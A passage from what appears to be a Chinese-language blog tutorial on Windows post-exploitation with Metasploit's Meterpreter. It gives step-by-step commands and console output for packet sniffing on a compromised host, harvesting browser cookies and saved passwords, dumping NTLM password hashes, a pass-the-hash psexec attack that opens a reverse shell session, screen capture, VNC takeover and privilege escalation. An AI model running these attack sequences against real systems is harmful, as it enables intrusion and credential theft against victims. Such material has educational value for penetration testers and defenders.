)<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; 3 &#8211; &#8216;Cisco Systems VPN Adapter&#8217; ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )<\/p>\n\n\n\n<p>meterpreter &gt; sniffer_start 2 #\u83b7\u53d6\u6b63\u5728\u5b9e\u65bd\u55c5\u63a2\u7f51\u7edc\u63a5\u53e3\u7684\u7edf\u8ba1\u6570\u636e<\/p>\n\n\n\n<p>[*] Capture started on interface 2 (50000 packet buffer)<\/p>\n\n\n\n<p>meterpreter &gt; sniffer_dump 2 \/tmp\/test2.cap #\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u9488\u5bf9\u7279\u5b9a\u8303\u56f4\u7684\u6570\u636e\u5305\u7f13\u51b2\u533a\u542f\u52a8\u55c5\u63a2<\/p>\n\n\n\n<p>[*] Flushing packet capture buffer for interface 2&#8230;<\/p>\n\n\n\n<p>[*] Flushed 1176 packets (443692 bytes)<\/p>\n\n\n\n<p>[*] Downloaded 100% (443692\/443692)&#8230;<\/p>\n\n\n\n<p>[*] Download completed, converting to PCAP&#8230;<\/p>\n\n\n\n<p>[*] PCAP file written to \/tmp\/test2.cap<\/p>\n\n\n\n<p>meterpreter &gt; sniffer_stop &nbsp;2&nbsp;&nbsp; #\u505c\u6b62\u55c5\u63a2<\/p>\n\n\n\n<p>Metasploit\u5305\u542bsniffer\u811a\u672c\u3002Meterpreter\u7684\u8fd9\u4e2a\u6a21\u5757\u53ef\u4ee5\u7528\u6765\u505a\u6570\u636e\u5305\u6355\u83b7,\u4e0d\u9700\u8981\u5728\u8fdc\u7a0b\u673a\u5668\u4e0a\u5b89\u88c5\u4efb\u4f55\u8f6f\u4ef6\uff1a<\/p>\n\n\n\n<p>\u9996\u5148\u6267\u884cuse sniffer\u547d\u4ee4\u4f5c\u7528\u4e3a\u4f7f\u7528\u55c5\u63a2\u811a\u672c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/204140136.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025511495-1651005392.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>sniffer_interfaces\u547d\u4ee4\u4e3a\u83b7\u53d6\u7f51\u5361\u7684\u4fe1\u606f\uff0c\u5f97\u5230\u6211\u4eec\u7684ID\u4e3a1.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/204202437.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025511796-2111730296.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>sniffer_start ID\u547d\u4ee4\u5f00\u59cb\u55c5\u63a2\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/204225145.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025512050-371694922.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>sniffer_dump ID filepath\u4fdd\u5b58\u6293\u53d6\u7684\u6570\u636e\u5305\uff0c\u672c\u4f8b\u4e2d\/tmp\/1.cap\u662f\u6293\u53d6\u6570\u636e\u5305\u7684\u4fdd\u5b58\u8def\u5f84\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/204239957.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025512367-855393732.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025513190-934557375.gif\" alt=\"\u8fd9\u91cc\u5199\u56fe\u7247\u63cf\u8ff0\"\/><\/figure>\n\n\n\n<p>\u5bf9\u6293\u53d6\u7684\u5305\u8fdb\u884c\u89e3\u5305\uff1a<\/p>\n\n\n\n<p>use auxiliary\/sniffer\/psnuffle<\/p>\n\n\n\n<p>set pcapfile 1.cap<\/p>\n\n\n\n<p>run<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025513723-1556150866.gif\" alt=\"20161006153844\"\/><\/figure>\n\n\n\n<p>\u7136\u540e\u5728shell\u4e2d\u4e2d\u8f93\u5165\uff1awireshark\uff0c\u52a0\u8f7d\u8fd9\u4e2a\/tmp\/xpsp1.cap\u5305\u5373\u53ef\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025514240-2008527548.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>8.\u83b7\u53d6\u654f\u611f\u4fe1\u606f<\/p>\n\n\n\n<p>run post\/windows\/gather\/checkvm #\u662f\u5426\u865a\u62df\u673a<\/p>\n\n\n\n<p>run post\/windows\/gather\/enum_applications #\u83b7\u53d6\u5b89\u88c5\u8f6f\u4ef6\u4fe1\u606f<\/p>\n\n\n\n<p>run post\/windows\/gather\/dumplinks&nbsp;&nbsp; #\u83b7\u53d6\u6700\u8fd1\u7684\u6587\u4ef6\u64cd\u4f5c<\/p>\n\n\n\n<p>run post\/windows\/gather\/enum_ie&nbsp; #\u83b7\u53d6IE\u7f13\u5b58<\/p>\n\n\n\n<p>run post\/windows\/gather\/enum_chrome&nbsp;&nbsp; #\u83b7\u53d6Chrome\u7f13\u5b58<\/p>\n\n\n\n<p>run scraper&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #\u83b7\u53d6\u5e38\u89c1\u4fe1\u606f<\/p>\n\n\n\n<p>#\u4fdd\u5b58\u5728\uff5e\/.msf4\/logs\/scripts\/scraper\/\u76ee\u5f55\u4e0b<\/p>\n\n\n\n<p>(1)post\/windows\/gather\/enum_application\u6a21\u5757\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u8f6f\u4ef6\u5b89\u88c5\u4fe1\u606f<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1arun&nbsp;post\/windows\/gather\/enum_applications<\/p>\n\n\n\n<p>\u6548\u679c\u5982\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025514944-395995266.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>(2) post\/windows\/gather\/enum_ie\u540e\u6e17\u900f\u6a21\u5757\uff0c\u8bfb\u53d6\u76ee\u6807\u4e3b\u673aIE\u6d4f\u89c8\u5668cookies\u7b49\u7f13\u5b58\u4fe1\u606f\uff0c\u55c5\u63a2\u76ee\u6807\u4e3b\u673a\u767b\u5f55\u8fc7\u7684\u5404\u7c7b\u8d26\u53f7\u5bc6\u7801<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1arun&nbsp; post\/windows\/gather\/enum_ie<\/p>\n\n\n\n<p>\u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025515806-426283986.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u83b7\u53d6\u5230\u7684\u76ee\u6807\u4e3b\u673a\u4e0a\u7684ie\u6d4f\u89c8\u5668\u7f13\u5b58\u5386\u53f2\u8bb0\u5f55\u548ccookies\u4fe1\u606f\u7b49\u90fd\u4fdd\u5b58\u5230\u4e86\u653b\u51fb\u4e3b\u673a\u672c\u5730\u7684\/root\/.msf5\/loot\/\u76ee\u5f55\u4e0b,\u8fd9\u91cc\u8bf4IE7\u4ee5\u4e0a\u624d\u6709\u6548<\/p>\n\n\n\n<p>9.\u83b7\u53d6Hash<\/p>\n\n\n\n<p>\u4f7f\u7528\u201chashdump\u201d\u547d\u4ee4\u53ef\u4ee5\u4ece\u7cfb\u7edf\u63d0\u53d6\u7528\u6237\u540d\u548c\u5bc6\u7801hashes\u3002\u4f7f\u7528hashdump\u547d\u4ee4\u53ef\u4ee5\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u7684SAM\u6587\u4ef6\uff0c\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u7684\u8d26\u53f7\u5bc6\u7801hash\u4fe1\u606f\uff0c\u5269\u4e0b\u7684\u53ef\u4ee5\u7528\u7206\u7834\u8f6f\u4ef6\u7b97\u51fa\u660e\u6587\u5bc6\u7801\uff0c\u5fae\u8f6f\u4e00\u822c\u7528LM,NTML\u548cNTLMv2\u5f62\u5f0f\u7684\u54c8\u5e0c\u8868\u5b58\u50a8\u5bc6\u7801\u3002\u82e5\u60f3\u8fd0\u884c\u8fd9\u4e2a\u547d\u4ee4,&nbsp;\u9700\u8981\u6709\u6ce8\u518c\u8868\u548cSAM [Security Account Manager]\u7684\u7cfb\u7edf\u7684\u6743\u9650\uff0c\u5982\u679c\u4f60\u662f\u4f5c\u4e3a\u4e00\u4e2a\u666e\u901a\u7684\u7528\u6237\u767b\u9646\u7684\u8bdd\uff0c\u4f60\u9700\u8981\u63d0\u5347\u6743\u9650,\u8fd9\u6211\u4eec\u5c06\u5728\u540e\u9762\u63d0\u5230\u3002<\/p>\n\n\n\n<p>meterpreter &gt; run post\/windows\/gather\/smart_hashdump<\/p>\n\n\n\n<p>[*] Running module against TESTING<\/p>\n\n\n\n<p>[*] Hashes will be saved to the database if one is connected.<\/p>\n\n\n\n<p>[*] Hashes will be saved in loot in JtR password file format to:<\/p>\n\n\n\n<p>[*] \/home\/croxy\/.msf4\/loot\/20150929225044_default_10.0.2.15_windows.hashes_407551.txt<\/p>\n\n\n\n<p>[*] Dumping password hashes&#8230;<\/p>\n\n\n\n<p>[*] Running as SYSTEM extracting hashes from registry<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp; Obtaining the boot key&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp; Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp; Obtaining the user list and keys&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp; Decrypting user keys&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp; Dumping password hints&#8230;<\/p>\n\n\n\n<p>[+]Croxy:&#8221;Whoareyou&#8221;<\/p>\n\n\n\n<p>[*]&nbsp;&nbsp;&nbsp;&nbsp; Dumping password hashes&#8230;<\/p>\n\n\n\n<p>[+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::&nbsp;<\/p>\n\n\n\n<p>[+]HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::<\/p>\n\n\n\n<p>[+]test123:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::<\/p>\n\n\n\n<p>\u811a\u672c\u548cpost\u6a21\u5757\u90fd\u9700\u8981\u901a\u8fc7\u201crun\u201d\u547d\u4ee4\u6267\u884c\uff0c\u6211\u5728\u6d4b\u8bd5\u73af\u5883\u4e2d\u8fd0\u884chashdump\u6a21\u5757\u540e\u7684\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/1511265684404.png\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025516450-1270381337.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u6570\u636e\u7684\u8f93\u51fa\u683c\u5f0f\u4e3a\uff1a\u7528\u6237\u540d\uff1aSID\uff1aLM\u54c8\u5e0c\uff1aNTLM\u54c8\u5e0c:::\uff0c\u6240\u4ee5\u6211\u4eec\u5f97\u5230\u4e86\u4e09\u4e2a\u7528\u6237\u8d26\u53f7\uff0c\u5206\u522b\u4e3aAdministrator, Guest\u548cCoen\u3002<\/p>\n\n\n\n<p>\u5176\u4e2d\u7684<a href=\"https:\/\/en.wikipedia.org\/wiki\/LAN_Manager\">LM<\/a>\u54c8\u5e0c\uff08aad3b435b51404eeaad3b435b51404ee\uff09\u8ddf<a href=\"https:\/\/en.wikipedia.org\/wiki\/NT_LAN_Manager\">NTLM<\/a>\u54c8\u5e0c\uff0831d6cfe0d16ae931b73c59d7e0c089c0\uff09\u5bf9\u5e94\u7684\u662f\u4e00\u4e2a\u7a7a\u5bc6\u7801\u3002<\/p>\n\n\n\n<p>\u63a5\u4e0b\u6765\u8981\u5904\u7406\u7684\u5c31\u662f\u7528\u6237Coen\u7684\u5bc6\u7801\uff08f773c5db7ddebefa4b0dae7ee8c50aea\uff09\u4e86\u3002\u867d\u7136\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u7c7b\u4f3c<a href=\"http:\/\/www.openwall.com\/john\/\">John the Ripper<\/a>\u8fd9\u6837\u7684\u5de5\u5177\u6765\u7834\u89e3\u5bc6\u7801\uff0c\u4f46\u662f\u6211\u4eec\u76f4\u63a5<a href=\"https:\/\/www.google.nl\/search?q=f773c5db7ddebefa4b0dae7ee8c50aea\">Google<\/a>\u8fd9\u4e2a\u54c8\u5e0c\u4e4b\u540e\uff0c\u5c31\u76f4\u63a5\u5f97\u5230\u4e86<a href=\"https:\/\/www.troyhunt.com\/bad-passwords-are-not-fun-and-good\/\">\u5bc6\u7801\u660e\u6587<\/a>\uff1a<a href=\"https:\/\/en.wikipedia.org\/wiki\/Trust_No_1\">trustno1<\/a>\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/204616787.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025516974-1056262125.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>use post\/windows\/gather\/hashdump<\/p>\n\n\n\n<p>set session 4<\/p>\n\n\n\n<p>run<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025517654-691429501.gif\" alt=\"20161006155822\"\/><\/figure>\n\n\n\n<ol class=\"wp-block-list\"><li>\u68c0\u67e5\u5df2\u6709\u6743\u9650+\u7cfb\u7edf\u7c7b\u578b&nbsp;&nbsp;<\/li><li>\u68c0\u67e5\u662f\u5426\u4e3a\u57df\u63a7\u5236\u5668&nbsp;&nbsp;<\/li><li>\u4ece\u6ce8\u518c\u8868\u8bfbhash\uff0c\u82e5\u5931\u8d25\uff0c\u6ce8\u5165LSASS\u8fdb\u7a0b\uff1b\u82e5\u57df\u63a7\u5236\u5668\uff0c\u76f4\u63a5\u6ce8\u5165LSASS\u8fdb\u7a0b&nbsp;&nbsp;<\/li><li>\u82e5win2008+\u4f1a\u8bdd\u7ba1\u7406\u5458\u6743\u9650\uff0c\u5c1d\u8bd5\u4f7f\u7528getsystem\uff0c\u82e5\u5728system\u4e0d\u80fd\u6ce8\u5165LSASS\uff0c\u5148migrate\u5230system\u6743\u9650\u4e0b\u7684\u8fdb\u7a0b\uff0c\u7ee7\u7eed\u6ce8\u5165LSASS&nbsp;&nbsp;<\/li><li>\u82e5win7\/Vista+UAC\u5173\u95ed+\u4f1a\u8bdd\u7ba1\u7406\u5458\u6743\u9650\uff0c\u5c1d\u8bd5getsystem\uff0c\u8bfb\u53d6hash&nbsp;&nbsp;<\/li><li>\u82e5win2003\/xp\/2000\uff0c\u76f4\u63a5getsystem\uff0c\u8bfb\u53d6hash&nbsp;&nbsp;<\/li><\/ol>\n\n\n\n<p>10.\u901a\u8fc7Hash\u83b7\u53d6\u6743\u9650<\/p>\n\n\n\n<p>msf &gt; use exploit\/windows\/smb\/psexec<\/p>\n\n\n\n<p>msf exploit(psexec) &gt; show options&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Module options (exploit\/windows\/smb\/psexec):&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Current Setting&nbsp; Required&nbsp; Description<\/p>\n\n\n\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-&nbsp; &#8212;&#8212;&#8211;&nbsp; &#8212;&#8212;&#8212;&#8211;<\/p>\n\n\n\n<p>RHOST&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The target address<\/p>\n\n\n\n<p>RPORT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 445&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Set the SMB service port<\/p>\n\n\n\n<p>SHAREADMIN$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; yes&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The share to connect to, can be an admi&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;n share<\/p>\n\n\n\n<p>(ADMIN$,C$,&#8230;) or a normal read\/write folder share<\/p>\n\n\n\n<p>SMBDomainWORKGROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; no&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The Windows domain to use for authentication<\/p>\n\n\n\n<p>SMBPass&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; no&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The password for the specified username<\/p>\n\n\n\n<p>SMBUser&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; no&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The username to authenticate as&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Exploit target:&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Id&nbsp; Name<\/p>\n\n\n\n<p>&#8212;&nbsp; &#8212;-<\/p>\n\n\n\n<p>0&nbsp;&nbsp; Automatic&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>msf exploit(psexec) &gt; set RHOST 192.168.0.254<\/p>\n\n\n\n<p>RHOST =&gt; 192.168.0.254<\/p>\n\n\n\n<p>msf exploit(psexec) &gt; set SMBUser isosky<\/p>\n\n\n\n<p>SMBUser =&gt; isosky<\/p>\n\n\n\n<p>msf exploit(psexec) &gt; set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>SMBPass =&gt; 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537<\/p>\n\n\n\n<p>msf exploit(psexec) &gt; exploit<\/p>\n\n\n\n<p>[*] Started reverse handler on 192.168.0.3:4444<\/p>\n\n\n\n<p>[*] Connecting to the server&#8230;<\/p>\n\n\n\n<p>[*] Authenticating to 192.168.0.254:445|WORKGROUP as user &#8216;isosky&#8217;&#8230;<\/p>\n\n\n\n<p>[*] Uploading payload&#8230;<\/p>\n\n\n\n<p>[*] Created \\UGdecsam.exe&#8230;<\/p>\n\n\n\n<p>[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\\svcctl] &#8230;<\/p>\n\n\n\n<p>[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\\svcctl] &#8230;<\/p>\n\n\n\n<p>[*] Obtaining a service manager handle&#8230;<\/p>\n\n\n\n<p>[*] Creating a new service (MZsCnzjn &#8211; &#8220;MrZdoQwIlbBIYZQJyumxYX&#8221;)&#8230;<\/p>\n\n\n\n<p>[*] Closing service handle&#8230;<\/p>\n\n\n\n<p>[*] Opening service&#8230;<\/p>\n\n\n\n<p>[*] Starting the service&#8230;<\/p>\n\n\n\n<p>[*] Removing the service&#8230;<\/p>\n\n\n\n<p>[*] Closing service handle&#8230;<\/p>\n\n\n\n<p>[*] Deleting \\UGdecsam.exe&#8230;<\/p>\n\n\n\n<p>[*] Sending stage (749056 bytes) to 192.168.0.254<\/p>\n\n\n\n<p>[*] Meterpreter session 1 opened (192.168.0.3:4444 -&gt; 192.168.0.254:1877) at 2011-07-19 03:57:17 +0800<\/p>\n\n\n\n<p>11.\u6355\u6349\u5c4f\u5e55<\/p>\n\n\n\n<p>\u8981\u60f3\u67e5\u770b\u5230\u8fdc\u7a0b\u673a\u5668\u5f53\u524d\u7684\u684c\u9762\u4fe1\u606f\uff0c\u53ef\u4ee5\u4f7f\u7528\u201cscreenshot\u201d\u547d\u4ee4\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u6b64\u547d\u4ee4\u4e0d\u4ec5\u628a\u5bf9\u65b9\u7684\u684c\u9762\u7ed9\u663e\u793a\u4e86\u51fa\u6765\u800c\u4e14\u628a\u684c\u9762\u4f5c\u4e3a\u56fe\u7247\u5f62\u5f0f\u4fdd\u5b58\u5728\u4e86\u672c\u5730\u3002\u6211\u4eec\u901a\u8fc7\u684c\u9762\u7684\u4fe1\u606f\u53ef\u4ee5\u77e5\u9053\u4e00\u4e9b\u5bf9\u6211\u4eec\u5165\u4fb5\u6709\u5e2e\u52a9\u7684\u4fe1\u606f\uff0c\u6bd4\u5982\u5bf9\u65b9\u7684\u6740\u6bd2\u8f6f\u4ef6\u7684\u7c7b\u578b\u7b49\u7b49\u3002<\/p>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u201cscreenshot\u201d\u547d\u4ee4\u6765\u8fdb\u884c\u5c4f\u5e55\u622a\u56fe\u5e76\u5b58\u50a8\u5728\u6211\u4eec\u7684\u7cfb\u7edf\u4e4b\u4e2d\u3002<a href=\"http:\/\/image.3001.net\/images\/20171121\/15112657653426.png\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n\n\n\n<p>\u622a\u53d6\u7684\u6548\u679c\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112657949698.png\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025518984-1976979685.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>12.\u5f97\u5230\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n<p>\u4f7f\u7528\u547d\u4ee4\u201crun vnc\u201d\u5c06\u4f1a\u5f39\u51fa\u7a97\u53e3\uff0c\u5728\u6b64\u7a97\u53e3\u4e2d\u5c31\u662f\u5bf9\u65b9\u73b0\u5728\u6253\u5f00\u7684\u684c\u9762\u60c5\u51b5\uff0c\u5728\u8fd9\u91cc\uff0c\u53ef\u4ee5\u5bf9\u8fdc\u7a0b\u673a\u5668\u8fdb\u884c\u64cd\u63a7\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205037995.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025519778-1891004820.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205054689.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025520662-740761989.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>13.\u6743\u9650\u63d0\u5347<\/p>\n\n\n\n<p>\u8fd9\u662fmeterpreter\u4e2d\u5b9e\u65bd\u6f0f\u6d1e\u5229\u7528\u7cfb\u7edf\u7279\u6743\u8981\u6c42\u7684\u4e00\u4e2a\u91cd\u8981\u7684\u6a21\u5757\u3002\u4e3a\u4e86\u8fd9\u4e2a\u76ee\u7684,\u6211\u4eec\u5fc5\u987b\u7528PRIV extention.\uff0c\u5728\u65e7\u7248\u672c\u7684Metasploit\u4e2dPriv extension\u5e76\u4e0d\u81ea\u52a8\u88c5\u8f7d\uff0c\u4f7f\u7528\u201cuse priv\u201d\u624b\u52a8\u52a0\u8f7d\u7684\u3002\u7136\u800c\u5728\u540e\u6765\u7684msf\u7248\u672c\u4e2d\u5e76\u4e0d\u9700\u8981\u62c5\u5fc3\u8fd9\u4e00\u70b9\u3002<\/p>\n\n\n\n<p>\u4f7f\u7528\u201cgetuid\u201d\u83b7\u5f97\u5f53\u524d\u7684\u6743\u9650\uff0cmigrate+PID\u8fc1\u79fb\u8fdb\u7a0b\uff08\u5f53\u6211\u4eec\u653b\u51fb\u4e00\u4e2a\u7cfb\u7edf\u662f\uff0c\u5e38\u5e38\u662f\u5bf9\u50cf\u662fIE\u4e4b\u7c7b\u7684\u670d\u52a1\u6f0f\u6d1e\u8fdb\u884c\u5229\u7528\u7684\uff0c\u53ef\u662f\u4e0d\u514d\u6709\u5bf9\u65b9\u5173\u95edIE\u7684\u60c5\u51b5\uff0c\u90a3\u4e48\u6211\u4eec\u7684meterpreter\u4f1a\u8bdd\u5c06\u4f1a\u5173\u95ed\uff0c\u4ece\u800c\u5bfc\u81f4\u4e0e\u76ee\u6807\u7cfb\u7edf\u5931\u53bb\u8fde\u63a5\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u8fc1\u79fb\u8fdb\u7a0b\u540e\u7684\u653b\u51fb\u6a21\u5757\uff0c\u5c06sessions\u8fc1\u79fb\u5230\u5185\u5b58\u7a7a\u95f4\u4e2d\u7684\u5176\u4ed6\u7a33\u5b9a\u7684\u3001\u4e0d\u4f1a\u88ab\u5173\u95ed\u7684\u670d\u52a1\u8fdb\u7a0b\u4e2d\uff0c\u4ee5\u7ef4\u6301\u7a33\u5b9a\u7684\u7cfb\u7edf\u63a7\u5236\uff09\uff0c\u4ece\u5217\u8868\u4e2d\u770b\u5230PID\u4e3a500\u7684\u662fadministrator\u6743\u9650\uff0c\u6240\u4ee5\u662f\u8fc1\u79fb\u5230administrator\u7684\u6743\u9650\uff0c\u201cgetsystem \u2013h\u201d\u5347\u7ea7\u4e3a\u6743\u9650SYSTEM\u8d26\u6237\u3002\u8fd9\u4e2a\u6a21\u5757\u53ef\u4ee5\u7528\u6765\u63d0\u5347\u6211\u4eec\u7684\u7279\u6743\uff0c\u6709\u56db\u4e2a\u6280\u5de7\u3002Meterpreter\u81ea\u52a8\u68c0\u67e5\u56db\u4e2a\u65b9\u6cd5\u5e76\u4e14\u5c1d\u8bd5\u5176\u6700\u597d\u65b9\u6cd5\u3002\u7136\u540e\u770b\u5230\u6211\u4eec\u6743\u9650\u53c8\u53d8\u4e3a\u4e86system\u6743\u9650\u4e86\u3002<\/p>\n\n\n\n<p>ps#\u5217\u51fa\u6b63\u5728\u8fd0\u884c\u7684\u8fdb\u7a0b<\/p>\n\n\n\n<p>kill pid # \u6740\u6b7b\u8fdb\u7a0b<\/p>\n\n\n\n<p>migrate pid # 